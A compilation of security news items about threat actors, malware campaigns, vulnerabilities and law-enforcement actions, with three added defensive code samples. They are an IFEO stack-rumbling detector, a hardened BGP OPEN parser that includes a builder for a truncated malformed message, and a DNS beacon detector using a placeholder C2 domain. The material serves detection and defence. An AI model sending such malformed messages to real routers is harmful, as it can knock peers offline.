"This recent campaign [...] abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard.sys, to disable security products installed on the hosts via a bring your own vulnerable driver (BYOVD) attack," Trend Micro said.

It's by no means the first time Earth Longzhi has leveraged the BYOVD technique, what with previous campaigns utilizing the vulnerable RTCore64.sys driver to restrict the execution of security products.

The malware, dubbed SPHijacker, also employs a second method referred to as "stack rumbling" to achieve the same objective, which entails making Windows Registry changes to interrupt the process execution flow and deliberately cause the targeted applications to crash upon launch.

"This technique is a type of [denial-of-service] attack that abuses undocumented MinimumStackCommitInBytes values in the [Image File Execution Options] registry key," Trend Micro explained.

"The value of MinimumStackCommitInBytes associated with a specific process in the IFEO registry key will be used to define the minimum size of stack to commit in initializing the main thread. If the stack size is too large, it will trigger a stack overflow exception and terminate the current process."
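A detection for the "stack rumbling" persistence described above, added here as an example that is not from the article or Trend Micro: it parses a `reg export` of the Image File Execution Options key and reports every image that has a MinimumStackCommitInBytes value set, flagging values above a 1 MiB sanity threshold (an assumed limit, not a documented Windows constant). The registry excerpt and image names are constructed.

```python
import re

# Constructed excerpt of a `reg export` of the IFEO key; the image names are placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\debugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\security-agent.exe]
"MinimumStackCommitInBytes"=dword:ffffffff

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\example-agent.exe]
"MinimumStackCommitInBytes"=dword:00010000
"""

# Per-image IFEO subkeys live directly under this prefix.
IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')


def parse_reg(text):
    """Yield (key, value_name, raw_data) for every value in a .reg export
    (assumed already decoded from the UTF-16 that reg.exe writes)."""
    current_key = None
    for line in text.splitlines():
        line = line.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group("key")
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current_key is not None:
            yield current_key, value_match.group("name"), value_match.group("data")


def find_stack_rumbling(text, threshold=1 << 20):
    """Report IFEO MinimumStackCommitInBytes settings. Any presence is worth review;
    values at or above `threshold` (assumed 1 MiB) are marked suspicious, as is any
    value the parser cannot decode, so nothing is silently skipped."""
    hits = []
    for key, name, data in parse_reg(text):
        if not key.lower().startswith(IFEO_PREFIX.lower()):
            continue
        if name.lower() != "minimumstackcommitinbytes":
            continue
        image = key[len(IFEO_PREFIX):]
        value = int(data[len("dword:"):], 16) if data.lower().startswith("dword:") else None
        hits.append({
            "image": image,
            "value": value,
            "suspicious": value is None or value >= threshold,
        })
    return hits


if __name__ == "__main__":
    for hit in find_stack_rumbling(SAMPLE_REG):
        print(hit)
```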

The twin approaches are far from the only methods that can be used to impair security products. Deep Instinct, last month, detailed a new code injection technique christened Dirty Vanity that exploits the remote forking mechanism in Windows to blindside endpoint detection systems.

What's more, the driver payload is installed as a kernel-level service using Microsoft Remote Procedure Call (RPC) as opposed to Windows APIs to evade detection.

Also observed in the attacks is the use of a DLL-based dropper named Roxwrapper to deliver another Cobalt Strike loader labeled BigpipeLoader as well as a privilege escalation tool (dwm.exe) that abuses the Windows Task Scheduler to launch a given payload with SYSTEM privileges.

The specified payload, dllhost.exe, is a downloader that's capable of retrieving next-stage malware from an actor-controlled server.

It's worth pointing out here that dwm.exe is based on an open source proof-of-concept (PoC) available on GitHub, suggesting that the threat actor is drawing inspiration from existing programs to hone its malware arsenal.

Trend Micro further said it identified decoy documents written in Vietnamese and Indonesian, indicating potential attempts to target users in the two countries in the future.

"Earth Longzhi remains active and continues to improve its tactics, techniques, and procedures (TTPs)," security researchers Ted Lee and Hara Hiroaki noted. "Organizations should stay vigilant against the continuous development of new stealthy schemes by cybercriminals."


Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust
3.5.23  Crime  The Hacker News
An international law enforcement operation has resulted in the arrest of 288 vendors who are believed to be involved in drug trafficking on the dark web, adding to a long list of criminal enterprises that have been shuttered in recent years.

The effort, codenamed Operation SpecTor, also saw the authorities confiscating more than $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms.

The largest number of arrests were made in the U.S. (153), followed by the U.K. (55), Germany (52), the Netherlands (10), Austria (9), France (5), Switzerland (2), Poland (1), and Brazil (1).

"This represents the most funds seized and the highest number of arrests in any coordinated international action," U.S. Attorney General Merrick B. Garland said. "The drug traffickers are confident that, by operating anonymously on the dark web, they can operate outside the bounds of the law. They are wrong."

The arrests stem from evidence gathered after the takedown of the Monopoly marketplace by German authorities in December 2021. DarkDotFail, in early January 2022, revealed that the criminal bazaar's servers were likely seized by law enforcement, although there was no official announcement.

"The vendors arrested as a result of the police action against Monopoly Market were also active on other illicit marketplaces, further impeding the trade of drugs and illicit goods on the dark web," Europol said in a statement.

"As a result, 288 vendors and buyers who engaged in tens of thousands of sales of illicit goods were arrested across Europe, the United States, and Brazil."

Europol said a number of these apprehended individuals were considered as high-value targets, adding law enforcement agencies gained access to the vendors' extensive buyer lists, potentially exposing "thousands of customers" who are now at risk of prosecution.

Operation SpecTor is a successor to DisrupTor and DarkHunTor, which led to the arrest of 329 alleged suspects in 2020 and 2021 for buying, selling, and coordinating the sale of outlawed goods across underground marketplaces and shops.

The development also comes as the U.S. Federal Bureau of Investigation (FBI) and the National Police of Ukraine seized nine virtual currency exchanges for knowingly offering cryptocurrency conversion services to criminal actors responsible for ransomware and other scams.

"These nine seized domains, 24xbtc.com, 100btc.pro, pridechange.com, 101crypta.com, uxbtc.com, trust-exchange.org, bitcoin24.exchange, paybtc.pro, and owl.gold offered anonymous cryptocurrency exchange services to website visitors," the Justice Department said.

The dismantling is part of a broader effort undertaken by governments in Europe and the U.S. to target infrastructure used by malicious actors to launder illegal proceeds and obscure the money trails.


Apple and Google Join Forces to Stop Unauthorized Tracking Alert System
3.5.23  Security  The Hacker News
Apple and Google have teamed up to work on a draft industry-wide specification that's designed to tackle safety risks and alert users when they are being tracked without their knowledge or permission using devices like AirTags.

"The first-of-its-kind specification will allow Bluetooth location-tracking devices to be compatible with unauthorized tracking detection and alerts across Android and iOS platforms," the companies said in a joint statement.

While these trackers are primarily designed to keep tabs on personal belongings like keys, wallets, luggage, and other items, such devices have also been abused by bad actors for criminal or nefarious purposes, including instances of stalking, harassment, and theft.

The goal is to standardize the alerting mechanisms and minimize opportunities for misuse across Bluetooth location-tracking devices from different vendors. To that end, Samsung, Tile, Chipolo, eufy Security, and Pebblebee have all come on board.

In doing so, tracking devices manufactured by the companies are required to adhere to a set of instructions and recommendations as well as notify users of any unauthorized tracking on iOS and Android devices.

"Formalizing a set of best practices for manufacturers will allow for scalable compatibility with unwanted tracking detection technologies on various smartphone platforms and improve privacy and security for individuals," according to the spec.

"Unwanted tracking detection can both detect and alert individuals that a location tracker separated from the owner's device is traveling with them, as well as provide means to find and disable the tracker."

A crucial aspect of the proposed specification is the use of a pairing registry, which contains verifiable (but obfuscated) identity information of the owner of an accessory (e.g., phone number or email address) along with the serial number of the accessory.

Besides retaining the data for a minimum of 25 days after the device has been unpaired (at which point it's deleted), the pairing registry is made available to law enforcement upon submission of a valid request.

In addition, the specification mandates that trackers transition from a "near-owner" mode to a "separated" mode should they no longer be near an owner's paired device for more than 30 minutes.

The companies are soliciting feedback from interested parties, following which a production implementation of the specification for unwanted tracking alerts is expected to be released sometime by the end of the year on both mobile ecosystems.

The last time Apple and Google came together, it was to devise a system-level platform that utilizes Bluetooth low energy (BLE) beacons to allow for contact tracing during the COVID-19 pandemic without using location data.


Hackers Exploiting 5-year-old Unpatched Vulnerability in TBK DVR Devices
3.5.23  Vulnerability  The Hacker News
Threat actors are actively exploiting an unpatched five-year-old flaw impacting TBK digital video recording (DVR) devices, according to an advisory issued by Fortinet FortiGuard Labs.

The vulnerability in question is CVE-2018-9995 (CVSS score: 9.8), a critical authentication bypass issue that could be exploited by remote actors to gain elevated permissions.

"The 5-year-old vulnerability (CVE-2018-9995) is due to an error when handling a maliciously crafted HTTP cookie," Fortinet said in an outbreak alert on May 1, 2023. "A remote attacker may be able to exploit this flaw to bypass authentication and obtain administrative privileges, eventually leading to access to camera video feeds."

The network security company said it observed over 50,000 attempts to exploit TBK DVR devices using the flaw in the month of April 2023. Despite the availability of a proof-of-concept (PoC) exploit, there are no fixes that address the vulnerability.

The flaw impacts TBK DVR4104 and DVR4216 product lines, which are also rebranded and sold using the names CeNova, DVR Login, HVR Login, MDVR Login, Night OWL, Novo, QSee, Pulnix, Securus, and XVR 5 in 1.

Additionally, Fortinet warned of a surge in the exploitation of CVE-2016-20016 (CVSS score: 9.8), another critical vulnerability affecting MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE.

The flaw could permit a remote unauthenticated attacker to execute arbitrary operating system commands as root due to the presence of a web shell that is accessible over a /shell URI.

"With tens of thousands of TBK DVRs available under different brands, publicly-available PoC code, and an easy-to-exploit flaw, this vulnerability is an easy target for attackers," Fortinet noted. "The recent spike in IPS detections shows that network camera devices remain a popular target for attackers."


CISA Issues Advisory on Critical RCE Affecting ME RTU Remote Terminal Units
3.5.23  Vulnerability  The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an Industrial Control Systems (ICS) advisory about a critical flaw affecting ME RTU remote terminal units.

The security vulnerability, tracked as CVE-2023-2131, has received the highest severity rating of 10.0 on the CVSS scoring system for its low attack complexity.

"Successful exploitation of this vulnerability could allow remote code execution," CISA said, describing it as a case of command injection affecting versions of INEA ME RTU firmware prior to version 3.36.

Security researcher Floris Hendriks of Radboud University has been credited with reporting the issue to CISA.

Also published by CISA is an alert related to multiple known security holes in Intel(R) processors impacting Factory Automation (FA) products from Mitsubishi Electric that could result in privilege escalation and a denial-of-service (DoS) condition.

The development comes as the agency recommended that critical infrastructure organizations take the necessary steps to secure their supply chains by reviewing the Federal Communications Commission's (FCC) Covered List of communications equipment that is deemed a national security risk.

CISA has also urged entities to adopt guidance issued by NIST to identify, assess, and mitigate supply chain risks, and enroll for the agency's free Vulnerability Scanning service to pinpoint vulnerable and high-risk devices.

It further follows efforts undertaken by cybersecurity authorities in Australia, Canada, the United Kingdom, Germany, the Netherlands, New Zealand, and the U.S. to "take urgent steps necessary to ship products that are secure-by-design and -default."


Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
3.5.23  Vulnerability  The Hacker News
Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers.

The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source internet routing protocol suite for Linux and Unix platforms. It's currently used by several vendors like NVIDIA Cumulus, DENT, and SONiC, posing supply chain risks.

The discovery is the result of an analysis of seven different implementations of BGP carried out by Forescout Vedere Labs: FRRouting, BIRD, OpenBGPd, Mikrotik RouterOS, Juniper JunOS, Cisco IOS, and Arista EOS.

BGP is a gateway protocol that's designed to exchange routing and reachability information between autonomous systems. It's used to find the most efficient routes for delivering internet traffic.

The list of three flaws is as follows -

CVE-2022-40302 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message with an Extended Optional Parameters Length option.
CVE-2022-40318 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message with an Extended Optional Parameters Length option.
CVE-2022-43681 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message that abruptly ends with the option length octet.
The issues "could be exploited by attackers to achieve a DoS condition on vulnerable BGP peers, thus dropping all BGP sessions and routing tables and rendering the peer unresponsive," the company said in a report shared with The Hacker News.

"The DoS condition may be prolonged indefinitely by repeatedly sending malformed packets. The main root cause is the same vulnerable code pattern copied into several functions related to different stages of parsing OPEN messages."

A threat actor could spoof a valid IP address of a trusted BGP peer or exploit other flaws and misconfigurations to compromise a legitimate peer and then issue a specially-crafted unsolicited BGP OPEN message.

This is achieved by taking advantage of the fact that "FRRouting begins to process OPEN messages (e.g., decapsulating optional parameters) before it gets a chance to verify the BGP Identifier and ASN fields of the originating router."
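The parsing problem described above, as an added example that is not FRRouting's code: a bounds-checked reader for the optional-parameters block of a BGP OPEN message (including the RFC 9072 extended-length form) that rejects a message ending on a parameter's length octet instead of reading past it. The AS numbers, identifier and capability bytes are constructed samples.

```python
"""Bounds-checked parser for the optional-parameters block of a BGP OPEN message."""
import struct

BGP_MARKER = b"\xff" * 16
BGP_HEADER_LEN = 19         # marker (16) + length (2) + type (1)
BGP_OPEN_TYPE = 1
OPEN_FIXED_LEN = 10         # version, my AS, hold time, BGP identifier, opt. params length
EXT_OPT_PARAMS = 0xFF       # RFC 9072 "Extended Optional Parameters Length" marker value


class MalformedOpen(ValueError):
    """Raised wherever a naive parser would read past the end of the buffer."""


def build_open(my_as, hold_time, bgp_id, params, extended=False):
    """Encode an OPEN message; params is a list of (type, value-bytes) pairs."""
    if extended:
        body = b"".join(struct.pack("!BH", t, len(v)) + v for t, v in params)
        # opt. params length 0xFF, non-ext type 0xFF, then the 2-octet extended length
        opt_block = struct.pack("!BBH", EXT_OPT_PARAMS, EXT_OPT_PARAMS, len(body)) + body
    else:
        body = b"".join(struct.pack("!BB", t, len(v)) + v for t, v in params)
        opt_block = struct.pack("!B", len(body)) + body
    payload = struct.pack("!BHHI", 4, my_as, hold_time, bgp_id) + opt_block
    header = BGP_MARKER + struct.pack("!HB", BGP_HEADER_LEN + len(payload), BGP_OPEN_TYPE)
    return header + payload


def parse_open(msg):
    """Return (my_as, hold_time, bgp_id, [(type, value), ...]) or raise MalformedOpen."""
    if len(msg) < BGP_HEADER_LEN + OPEN_FIXED_LEN:
        raise MalformedOpen("shorter than the fixed OPEN fields")
    if msg[:16] != BGP_MARKER:
        raise MalformedOpen("bad marker")
    length, msg_type = struct.unpack_from("!HB", msg, 16)
    if msg_type != BGP_OPEN_TYPE:
        raise MalformedOpen("not an OPEN message")
    if length != len(msg):
        raise MalformedOpen("header length does not match the buffer")
    version, my_as, hold_time, bgp_id, opt_len = struct.unpack_from("!BHHIB", msg, BGP_HEADER_LEN)
    if version != 4:
        raise MalformedOpen("unsupported BGP version")

    pos = BGP_HEADER_LEN + OPEN_FIXED_LEN
    len_size = 1
    if opt_len == EXT_OPT_PARAMS:
        # RFC 9072: 0xFF is followed by a non-ext type octet (0xFF) and a 2-octet
        # length, and every parameter then carries a 2-octet length as well.
        if len(msg) - pos < 3:
            raise MalformedOpen("extended length header truncated")
        non_ext_type, opt_len = struct.unpack_from("!BH", msg, pos)
        if non_ext_type != EXT_OPT_PARAMS:
            raise MalformedOpen("bad non-extended type octet")
        pos += 3
        len_size = 2

    end = pos + opt_len
    if end != len(msg):
        raise MalformedOpen("optional parameters length disagrees with message length")

    params = []
    while pos < end:
        # The check the vulnerable pattern omits: the type/length header must fit
        # inside the block before its length octet(s) are read.
        if end - pos < 1 + len_size:
            raise MalformedOpen("parameter header truncated")
        ptype = msg[pos]
        if len_size == 1:
            plen = msg[pos + 1]
        else:
            plen = struct.unpack_from("!H", msg, pos + 1)[0]
        pos += 1 + len_size
        # ...and the value must fit too before it is sliced out.
        if end - pos < plen:
            raise MalformedOpen("parameter value truncated")
        params.append((ptype, bytes(msg[pos:pos + plen])))
        pos += plen
    return my_as, hold_time, bgp_id, params


def is_well_formed(msg):
    """True if parse_open accepts the message, False if it is rejected."""
    try:
        parse_open(msg)
        return True
    except MalformedOpen:
        return False


def sample_truncated_open():
    """Constructed message whose outer lengths are consistent but whose only
    parameter announces six value bytes and then the message ends."""
    payload = struct.pack("!BHHIB", 4, 65001, 90, 0x0A000001, 2) + b"\x02\x06"
    return BGP_MARKER + struct.pack("!HB", BGP_HEADER_LEN + len(payload), BGP_OPEN_TYPE) + payload


if __name__ == "__main__":
    # Constructed sample: multiprotocol capability (code 1) for IPv4 unicast.
    cap = (2, b"\x01\x04\x00\x01\x00\x01")
    print(parse_open(build_open(65001, 90, 0x0A000001, [cap], extended=True)))
    print(is_well_formed(sample_truncated_open()))
```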

Forescout has also made available a Python-based open source BGP Fuzzer tool that allows organizations to test the security of the BGP suites used internally as well as find new flaws in BGP implementations.

"Modern BGP implementations still have low-hanging fruits that can be abused by attackers," Forescout said. "To mitigate the risk of vulnerable BGP implementations, [...] the best recommendation is to patch network infrastructure devices as often as possible."

The findings come weeks after ESET found that secondhand routers previously used in business networking environments harbored sensitive data, including corporate credentials, VPN details, cryptographic keys, and other vital customer information.

"In the wrong hands, the data gleaned from the devices – including customer data, router-to-router authentication keys, application lists, and much more – is enough to launch a cyberattack," the Slovak cybersecurity firm said.


BouldSpy Android Spyware: Iranian Government's Alleged Tool for Spying on Minority Groups
3.5.23  Android  The Hacker News
A new Android surveillanceware possibly used by the Iranian government has been used to spy on over 300 individuals belonging to minority groups.

The malware, dubbed BouldSpy, has been attributed with moderate confidence to the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). Targeted victims include Iranian Kurds, Baluchis, Azeris, and Armenian Christian groups.

"The spyware may also have been used in efforts to counter and monitor illegal trafficking activity related to arms, drugs, and alcohol," Lookout said, based on exfiltrated data that contained photos of drugs, firearms, and official documents issued by FARAJA.

BouldSpy, like other Android malware families, abuses its access to Android's accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings.

It's worth pointing out that BouldSpy refers to the same Android malware that Cyble codenamed DAAM in its own analysis last month.

Evidence gathered so far points to BouldSpy being installed on targets' devices via physical access, potentially confiscated after detention. This theory is bolstered by the fact that the first locations gathered from victim devices are mostly concentrated around Iranian law enforcement establishments and border control posts.

The malware comes alongside a command-and-control (C2) panel to manage victim devices, not to mention create new malicious apps that masquerade as seemingly innocuous apps like benchmarking tools, currency converters, interest calculators, and the Psiphon censorship circumvention utility.

Other noteworthy features comprise its ability to run additional code sent from the C2 server, receive commands through SMS messages, and even disable battery management features to prevent the device from terminating the spyware.

It further incorporates an "unused and nonfunctional" ransomware component that borrows its implementation from an open source project called CryDroid, raising the possibility that it's being actively developed or is a false flag planted by the threat actor.

"Once installed, the spyware will seek to establish a network connection to its C2 server and exfiltrate any cached data from the victim's device to the server," Lookout researchers said. "BouldSpy represents yet another surveillance tool taking advantage of the personal nature of mobile devices."


LOBSHOT: A Stealthy, Financial Trojan and Info Stealer Delivered through Google Ads
3.5.23  Virus  The Hacker News
In yet another instance of how threat actors are abusing Google Ads to serve malware, a threat actor has been observed leveraging the technique to deliver a new Windows-based financial trojan and information stealer called LOBSHOT.

"LOBSHOT continues to collect victims while staying under the radar," Elastic Security Labs researcher Daniel Stepanic said in an analysis published last week.

"One of LOBSHOT's core capabilities is around its hVNC (Hidden Virtual Network Computing) component. These kinds of modules allow for direct and unobserved access to the machine."

The American-Dutch company attributed the malware strain to a threat actor known as TA505 based on infrastructure historically connected to the group. TA505 is a financially motivated e-crime syndicate that overlaps with activity clusters tracked under the names Evil Corp, FIN11, and Indrik Spider.

The latest development is significant because it's a sign that TA505, which is associated with the Dridex banking trojan, is once again expanding its malware arsenal to perpetrate data theft and financial fraud.

LOBSHOT, with early samples dating back to July 2022, is distributed by means of rogue Google ads for legitimate tools like AnyDesk that are hosted on a network of lookalike landing pages maintained by the operators.

The malware incorporates dynamic import resolution (i.e., resolving the names of necessary Windows APIs at runtime), anti-emulation checks, and string obfuscation to evade detection by security software.

Once installed, it makes Windows Registry changes to set up persistence and siphons data from over 50 cryptocurrency wallet extensions present in web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox.


LOBSHOT's other notable features revolve around its ability to remotely access the compromised host via an hVNC module and stealthily perform actions on it without attracting the victim's attention.

"Threat groups are continuing to leverage malvertising techniques to masquerade legitimate software with backdoors like LOBSHOT," Stepanic said.

"These kinds of malware seem small, but end up packing significant functionality which helps threat actors move quickly during the initial access stages with fully interactive remote control capabilities."

The findings also underscore how an increasing number of adversaries are adopting malvertising and search engine optimization (SEO) poisoning as a technique to redirect users to fake websites and download trojanized installers of popular software.

According to data from eSentire, the threat actors behind GootLoader have been linked to a string of attacks targeting law firms and corporate legal departments in the U.S., Canada, the U.K., and Australia.

GootLoader, which has been active since 2018 and functions as an initial access-as-a-service operation for ransomware attacks, employs SEO poisoning to entice victims searching for agreements and contracts to infected WordPress blogs that point to links containing the malware.

Besides implementing geofencing to target victims in select regions, the attack chain is designed such that the malware can only be downloaded once per day from the hijacked sites in order to elude discovery by incident responders.

eSentire found that the IP address check GootLoader uses to screen out already-infected victims could be turned against it: by having end users' IP addresses blocked preemptively, organizations can be spared potential infections.


North Korea's ScarCruft Deploys RokRAT Malware via LNK File Infection Chains
3.5.23  Virus  The Hacker News
The North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.

"RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate multi-stage infection chains," Check Point said in a new technical report.

"This is another representation of a major trend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from untrusted sources."

ScarCruft, also known by the names APT37, InkySquid, Nickel Foxcroft, Reaper, RedEyes, and Ricochet Chollima, is a threat group that almost exclusively targets South Korean individuals and entities as part of spear-phishing attacks designed to deliver an array of custom tools.

The adversarial collective, unlike the Lazarus Group or Kimsuky, is overseen by North Korea's Ministry of State Security (MSS), which is tasked with domestic counterespionage and overseas counterintelligence activities, per Mandiant.

The group's primary malware of choice is RokRAT (aka DOGCALL), which has since been adapted to other platforms such as macOS (CloudMensis) and Android (RambleOn), indicating that the backdoor is being actively developed and maintained.

RokRAT and its variants are equipped to carry out a wide range of activities like credential theft, data exfiltration, screenshot capture, system information gathering, command and shellcode execution, and file and directory management.

The collected information, some of which is stored in the form of MP3 files to cover its tracks, is sent back using cloud services like Dropbox, Microsoft OneDrive, pCloud, and Yandex Cloud in a bid to disguise the command-and-control (C2) communications as legitimate.

Other bespoke malware used by the group includes, but is not limited to, Chinotto, BLUELIGHT, GOLDBACKDOOR, Dolphin, and, most recently, M2RAT. It's also known to use commodity malware such as Amadey, a downloader that can receive commands from the attacker to download additional payloads, in a bid to confuse attribution.

The use of LNK files as decoys to activate the infection sequences was also highlighted by the AhnLab Security Emergency Response Center (ASEC) last week, with the files containing PowerShell commands that deploy the RokRAT malware.

While the change in modus operandi signals ScarCruft's endeavors to keep up with the shifting threat ecosystem, it has continued to leverage macro-based malicious Word documents as recently as April 2023 to drop the malware, mirroring a similar chain that was reported by Malwarebytes in January 2021.

Another attack wave observed at the beginning of November 2022, according to the Israeli cybersecurity company, employed ZIP archives incorporating LNK files to deploy the Amadey malware.

"[The LNK file] method can trigger an equally effective infection chain by a simple double click, one that is more reliable than n-day exploits or the Office macros which require additional clicks to launch," Check Point said.

"APT37 continues to pose a considerable threat, launching multiple campaigns across the platforms and significantly improving its malware delivery methods."

The findings come as Kaspersky disclosed a new Go-based malware developed by ScarCruft codenamed SidLevel that utilizes the cloud messaging service Ably as a C2 mechanism for the first time and comes with "extensive capabilities to steal sensitive information from victims."

"The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea," the Russian cybersecurity firm noted in its APT Trends Report for Q1 2023.


Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected
3.5.23  Exploit  The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The security vulnerabilities are as follows -

CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability
CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability
CVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability
CVE-2023-1389 concerns a case of command injection affecting TP-Link Archer AX-21 routers that could be exploited to achieve remote code execution. According to Trend Micro's Zero Day Initiative, the flaw has been put to use by threat actors associated with the Mirai botnet since April 11, 2023.

The second flaw to be added to the KEV catalog is CVE-2021-45046, a remote code execution flaw affecting the Apache Log4j2 logging library that came to light in December 2021.

It's currently not clear how this specific vulnerability is being abused in the wild, although data gathered by GreyNoise shows evidence of exploitation attempts from as many as 74 unique IP addresses over the past 30 days. This, however, also includes CVE-2021-44228 (aka Log4Shell).

Completing the list is a high-severity bug in Oracle WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 that could allow unauthorized access to sensitive data. It was patched by the company as part of updates released in January 2023.

"Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server," CISA said.

While proof-of-concept (PoC) exploits exist for the flaw, there do not appear to be any public reports of malicious exploitation.

Federal Civilian Executive Branch (FCEB) agencies are required to apply vendor-provided fixes by May 22, 2023, to secure their networks against these active threats.

The advisory also comes a little over a month after VulnCheck revealed that nearly four dozen security flaws that have likely been weaponized in the wild in 2022 are missing from the KEV catalog.

Of the 42 vulnerabilities, an overwhelming majority are related to exploitation by Mirai-like botnets (27), followed by ransomware gangs (6) and other threat actors (9).


New Decoy Dog Malware Toolkit Uncovered: Targeting Enterprise Networks
1.5.23  Virus  The Hacker News
An analysis of over 70 billion DNS records has led to the discovery of a new sophisticated malware toolkit dubbed Decoy Dog targeting enterprise networks.

Decoy Dog, as the name implies, is evasive and employs techniques like strategic domain aging and DNS query dribbling, wherein a series of queries are transmitted to the command-and-control (C2) domains so as to not arouse any suspicion.

"Decoy Dog is a cohesive toolkit with a number of highly unusual characteristics that make it uniquely identifiable, particularly when examining its domains on a DNS level," Infoblox said in an advisory published late last month.

The cybersecurity firm, which identified the malware in early April 2023 following anomalous DNS beaconing activity, said its atypical characteristics allowed it to map additional domains that are part of the attack infrastructure.

That said, the usage of Decoy Dog in the wild is "very rare," with the DNS signature matching less than 0.0000027% of the 370 million active domains on the internet, according to the California-based company.

One of the chief components of the toolkit is Pupy RAT, an open source trojan that's delivered by means of a method called DNS tunneling, in which DNS queries and responses are used as a C2 for stealthily dropping payloads.

It's worth noting that the use of the cross-platform Pupy RAT has been linked to nation-state actors from China such as Earth Berberoka (aka GamblingPuppet) in the past, although there's no evidence to suggest the actor's involvement in this campaign.

Further investigation into Decoy Dog suggests that the operation had been set up at least a year prior to its discovery, with three distinct infrastructure configurations detected to date.

Another crucial aspect is the unusual DNS beaconing behavior associated with Decoy Dog domains: they adhere to a pattern of periodic but infrequent DNS requests so as to fly under the radar.
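Detection logic for the beaconing pattern just described, written here as an added example rather than Infoblox's own signature: it groups constructed DNS log lines by client and registered domain and flags pairs whose gaps between queries are long but regular, while leaving both irregular browsing and frequent polling alone. The log format, the thresholds, and the domain names are assumptions.

```python
"""Flag clients that resolve one domain on a slow but regular cadence."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log, one "<ISO timestamp> <client IP> <queried name>" per line.
# 10.0.0.5 resolves a fresh label under c2-placeholder.test about once an hour and
# browses www.example.com irregularly; 10.0.0.7 polls time.example.net every 30 s.
SAMPLE_LOG = """\
2023-04-10T00:00:00 10.0.0.5 www.example.com
2023-04-10T00:00:00 10.0.0.5 a7f1.c2-placeholder.test
2023-04-10T00:00:15 10.0.0.5 www.example.com
2023-04-10T00:00:40 10.0.0.5 www.example.com
2023-04-10T00:00:00 10.0.0.7 time.example.net
2023-04-10T00:00:30 10.0.0.7 time.example.net
2023-04-10T00:01:00 10.0.0.7 time.example.net
2023-04-10T00:01:30 10.0.0.7 time.example.net
2023-04-10T00:02:00 10.0.0.7 time.example.net
2023-04-10T00:50:00 10.0.0.5 www.example.com
2023-04-10T00:50:10 10.0.0.5 www.example.com
2023-04-10T01:00:02 10.0.0.5 3be0.c2-placeholder.test
2023-04-10T01:59:58 10.0.0.5 90c4.c2-placeholder.test
2023-04-10T02:30:00 10.0.0.5 www.example.com
2023-04-10T03:00:01 10.0.0.5 e12d.c2-placeholder.test
2023-04-10T03:59:59 10.0.0.5 77ab.c2-placeholder.test
"""


def registered_domain(qname):
    """Last two labels of the name; production code would use the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    """Group query timestamps by (client, registered domain)."""
    events = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, client, qname = line.split()
        events[(client, registered_domain(qname))].append(datetime.fromisoformat(stamp))
    return events


def find_beacons(text, min_queries=4, min_period=600, max_jitter=0.2):
    """Return [(client, domain, period_seconds)] for pairs whose gaps between
    queries average at least min_period seconds and vary by at most max_jitter
    (population std. dev. over mean): the "periodic but infrequent" pattern."""
    hits = []
    for (client, domain), stamps in parse_log(text).items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        period = mean(gaps)
        # Too frequent (e.g. 30 s polling) or too irregular (browsing) is not a beacon.
        if period < min_period or pstdev(gaps) / period > max_jitter:
            continue
        hits.append((client, domain, round(period)))
    return hits


if __name__ == "__main__":
    for client, domain, period in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {domain}: every ~{period} s")
```

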